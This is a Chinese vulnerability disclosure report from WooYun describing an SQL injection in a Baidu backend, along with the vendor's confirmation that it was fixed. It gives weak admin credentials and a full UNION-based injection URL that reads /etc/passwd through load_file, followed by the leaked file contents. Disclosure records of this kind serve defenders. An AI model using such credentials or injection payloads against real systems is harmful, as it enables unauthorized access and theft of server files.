当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0112

漏洞标题:Baidu某系统后台存在sql注入漏洞

相关厂商:百度

漏洞作者: henrys_dad

提交时间:2010-07-26 15:05

修复时间:2010-08-25 21:00

公开时间:2010-08-25 21:00

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-07-26: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-25: 细节向公众公开

简要描述:

Baidu某系统后台登录界面没有验证码等防范暴力破解措施,并且提示信息能够显示是否存在某用户名
登录后,发现某url存在integer型sql注入漏洞,能够爆库并读取任意文件。

详细说明:

利用http://utility.baidu.com/traf/ 存在的弱口令 ad,ad可以进入到后台。
url:http://utility.baidu.com/traf/detail.php?aid=215 存在整数型 sql 注入漏洞。

漏洞证明:

http://utility.baidu.com/traf/detail.php?aid=1894%20and%201=2%20union%20select%20concat%28char%2894%29,char%2894%29,char%2894%29,load_file%280x2f6574632f706173737764%29,char%2894%29,char%2894%29,char%2894%29%29,1,1,1,1,1,1,1%20--
root:x:0:0:root:/root:/bin/bash
****
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
radvd:x:75:75:radvd user:/:/bin/false
rd:x:501:504::/home/rd:/bin/bash
work:x:502:504::/home/work:/bin/bash

修复方案:

建议:
限制能够访问该后台地址的ip;
强化密码策略;
添加验证码;
修改用户名或密码错误提示;
避免sql注入

版权声明:转载请注明来源 henrys_dad@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2010-07-26 15:05

厂商回复:

非常感谢您的举报,我们已经安排开始修复。

最新状态:

2010-08-21:已经完成修复,谢谢henrys_dad!!!


漏洞评价:

评论

  1. 2014-07-02 11:35 | he1renyagao ( 普通白帽子 | Rank:225 漏洞数:29 | 是金子总会发光,在还未发光之前,先打磨打...)

    mark